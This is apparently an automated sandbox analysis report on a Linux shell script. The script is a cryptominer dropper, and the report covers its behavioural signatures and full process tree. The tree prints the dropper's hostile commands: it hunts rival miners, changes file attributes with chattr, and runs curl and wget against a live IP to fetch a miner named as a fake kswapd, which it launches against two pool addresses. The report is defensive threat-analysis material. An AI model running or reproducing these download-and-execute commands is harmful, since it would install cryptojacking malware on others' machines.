Analysis
-
max time kernel
130s -
max time network
132s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
30-06-2024 18:39
Static task
static1
Behavioral task
behavioral1
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Size
5KB
-
MD5
7b72cf30ac42c20f0a14b0b87425c00a
-
SHA1
74402152ac0f0c9dfed6f76975080ce1d0d4584d
-
SHA256
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
-
SHA512
1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
-
SSDEEP
96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
.kswapd.kswapdioc pid process /.cache/.kswapd 853 .kswapd /.cache/.kswapd 1029 .kswapd -
Attempts to change immutable files 27 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
grepchattrgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepgrepchattrgrepgrepgrepgrepgrepgreppid process 807 grep 932 chattr 985 grep 997 grep 801 grep 993 grep 1005 grep 831 grep 973 grep 767 grep 771 grep 825 grep 981 grep 989 grep 759 grep 785 grep 791 grep 775 grep 780 grep 796 grep 718 chattr 818 grep 763 grep 977 grep 1001 grep 1009 grep 1013 grep -
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 1 TTPs 1 IoCs
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.shdescription ioc process File opened for modification /usr/local/bin/.e9bFa2Eb3D9B 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads CPU attributes 1 TTPs 6 IoCs
Processes:
pspspspspspsdescription ioc process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
pspspspspsgreppsdescription ioc process File opened for reading /proc/942/stat ps File opened for reading /proc/728/stat ps File opened for reading /proc/103/stat ps File opened for reading /proc/6/cmdline ps File opened for reading /proc/113/stat ps File opened for reading /proc/41/stat ps File opened for reading /proc/112/cmdline ps File opened for reading /proc/649/exe grep File opened for reading /proc/143/status ps File opened for reading /proc/156/status ps File opened for reading /proc/140/status ps File opened for reading /proc/147/status ps File opened for reading /proc/21/status ps File opened for reading /proc/592/stat ps File opened for reading /proc/28/stat ps File opened for reading /proc/sys/kernel/pid_max ps File opened for reading /proc/23/cmdline ps File opened for reading /proc/592/stat ps File opened for reading /proc/929/cmdline ps File opened for reading /proc/110/status ps File opened for reading /proc/649/cmdline ps File opened for reading /proc/962/cmdline ps File opened for reading /proc/156/stat ps File opened for reading /proc/745/status ps File opened for reading /proc/945/status ps File opened for reading /proc/275/stat ps File opened for reading /proc/24/status ps File opened for reading /proc/28/status ps File opened for reading /proc/697/stat ps File opened for reading /proc/103/cmdline ps File opened for reading /proc/18/stat ps File opened for reading /proc/112/cmdline ps File opened for reading /proc/13/status ps File opened for reading /proc/721/status ps File opened for reading /proc/28/status ps File opened for reading /proc/304/status ps File opened for reading /proc/25/cmdline ps File opened for reading /proc/11/stat ps File opened for reading /proc/6/status ps File opened for reading /proc/696/cmdline ps File opened for reading /proc/635/stat ps File opened for reading /proc/274/status ps File opened for reading /proc/746/stat ps File opened for reading /proc/24/cmdline ps File opened for reading /proc/303/cmdline ps File opened for reading /proc/745/cmdline ps File opened for reading /proc/967/stat ps File opened for reading /proc/24/status ps File opened for reading /proc/930/stat ps File opened for reading /proc/25/cmdline ps File opened for reading /proc/969/stat ps File opened for reading /proc/7/stat ps File opened for reading /proc/274/status ps File opened for reading /proc/7/status ps File opened for reading /proc/16/cmdline ps File opened for reading /proc/272/status ps File opened for reading /proc/940/status ps File opened for reading /proc/8/cmdline ps File opened for reading /proc/285/stat ps File opened for reading /proc/304/cmdline ps File opened for reading /proc/321/status ps File opened for reading /proc/12/stat ps File opened for reading /proc/650/status ps File opened for reading /proc/724/cmdline ps -
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.shdescription ioc process File opened for modification /dev/shm/.e9bFa2Eb3D9B 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.shdescription ioc process File opened for modification /tmp/.e9bFa2Eb3D9B 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Processes
-
/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh1⤵
- Write file to user bin folder
- Writes file to shm directory
- Writes file to tmp directory
-
/bin/unameuname -a2⤵
-
/bin/rmrm --help2⤵
-
/bin/grepgrep " rm does not remove dir"2⤵
-
/usr/bin/wcwc -l2⤵
-
/usr/bin/curlcurl --help2⤵
- Checks CPU configuration
-
/bin/grepgrep -i "Dump libcurl equivalent"2⤵
-
/usr/bin/wcwc -l2⤵
-
/usr/bin/wgetwget --version2⤵
-
/bin/grepgrep -i "wgetrc "2⤵
-
/usr/bin/wcwc -l2⤵
-
/usr/bin/headhead /dev/urandom2⤵
-
/usr/bin/trtr -dc A-Za-z0-92⤵
-
/usr/bin/shufshuf -i 4-16 -n 12⤵
-
/usr/bin/headhead -c 122⤵
-
/bin/rmrm -f /tmp/.e9bFa2Eb3D9B2⤵
-
/bin/rmrm -f /tmp/.e9bFa2Eb3D9B2⤵
-
/bin/rmrm -f /usr/local/bin/.e9bFa2Eb3D9B2⤵
-
/bin/rmrm -f /dev/shm/.e9bFa2Eb3D9B2⤵
-
/bin/rmrm -f /.e9bFa2Eb3D9B2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v "sh "2⤵
-
/bin/grepgrep " sleep 120"2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v "sh "2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep " sleep 120"2⤵
-
/usr/bin/wcwc -l2⤵
-
/bin/sleepsleep 1202⤵
-
/bin/mkdirmkdir -p /.cache/2⤵
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
-
/bin/chmodchmod 1755 /.cache/2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v l02⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi "java "2⤵
-
/bin/grepgrep -vi jenkins2⤵
-
/bin/grepgrep -vi exim2⤵
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵
-
/usr/bin/headhead -n 12⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v l02⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v python2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi bash2⤵
-
/bin/grepgrep -vi exim2⤵
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵
-
/usr/bin/uniquniq2⤵
-
/bin/readlinkreadlink /proc/303/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/303/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/304/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/304/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/315/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/315/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/592/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/592/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/595/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/595/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/635/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/635/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/636/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/636/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/640/cwd2⤵
-
/bin/catcat /proc/640/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/641/cwd2⤵
-
/bin/catcat /proc/641/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/642/cwd2⤵
-
/bin/catcat /proc/642/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/649/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/649/exe2⤵
- Attempts to change immutable files
- Reads runtime system information
-
/bin/rmrm -rf /usr/sbin/agent2⤵
-
/bin/readlinkreadlink /proc/650/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/650/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/651/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/651/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/716/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/716/exe2⤵
- Attempts to change immutable files
-
/bin/grepgrep x86_642⤵
-
/usr/bin/wcwc -l2⤵
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd2⤵
- Checks CPU configuration
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd2⤵
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
-
/bin/sleepsleep 1202⤵
-
/bin/mkdirmkdir -p /.cache/2⤵
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
-
/bin/chmodchmod 1755 /.cache/2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v l02⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi "java "2⤵
-
/bin/grepgrep -vi jenkins2⤵
-
/bin/grepgrep -vi exim2⤵
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵
-
/usr/bin/headhead -n 12⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v l02⤵
-
/bin/grepgrep -v eth12⤵
-
/bin/grepgrep -v lan02⤵
-
/bin/grepgrep -v "^-"2⤵
-
/bin/grepgrep -v eth02⤵
-
/bin/grepgrep -v inet02⤵
-
/bin/grepgrep -v lano2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v defunct2⤵
-
/bin/grepgrep -v python2⤵
-
/bin/grepgrep -v knthread2⤵
-
/bin/grepgrep -vi aaaaaaaaaa2⤵
-
/bin/grepgrep -vi bash2⤵
-
/bin/grepgrep -vi exim2⤵
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵
-
/usr/bin/uniquniq2⤵
-
/bin/readlinkreadlink /proc/303/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/303/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/304/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/304/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/315/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/315/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/592/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/592/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/595/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/595/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/640/cwd2⤵
-
/bin/catcat /proc/640/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/641/cwd2⤵
-
/bin/catcat /proc/641/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/642/cwd2⤵
-
/bin/catcat /proc/642/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/905/cwd2⤵
-
/bin/catcat /proc/905/comm2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kworker/u2:22⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/928/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/928/exe2⤵
- Attempts to change immutable files
-
/bin/readlinkreadlink /proc/930/exe2⤵
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/930/exe2⤵
- Attempts to change immutable files
-
/usr/bin/cutcut -c 1-322⤵
-
/usr/bin/md5summd5sum /.cache/.kswapd2⤵
-
/usr/bin/md5summd5sum /.cache/.kswapd2⤵
-
/usr/bin/cutcut -c 1-322⤵
-
/bin/grepgrep x86_642⤵
-
/usr/bin/wcwc -l2⤵
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd2⤵
- Checks CPU configuration
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd2⤵
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵
- Executes dropped EXE
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
/tmp/.e9bFa2Eb3D9BFilesize
13B
MD5119e988d14765ff8d6f26841f49eaa46
SHA112f83e1dec392d08d17703f0f091631ad12524b6
SHA2567ebef7ecc2d830825ff28a987c274b65628ffb3bc8c8e50d5f084bbb6864af34
SHA512a93a33d7079111b8aabc3029ad1a836a1a11a44351d9584c5e2d4c236f1dc87cbe2eb28ac56485e334491da0650618da001fb1fb76f9fa90aa9e4d5af432603e
-
memory/1027-1-0xb6bb3000-0xb6bc4044-memory.dmp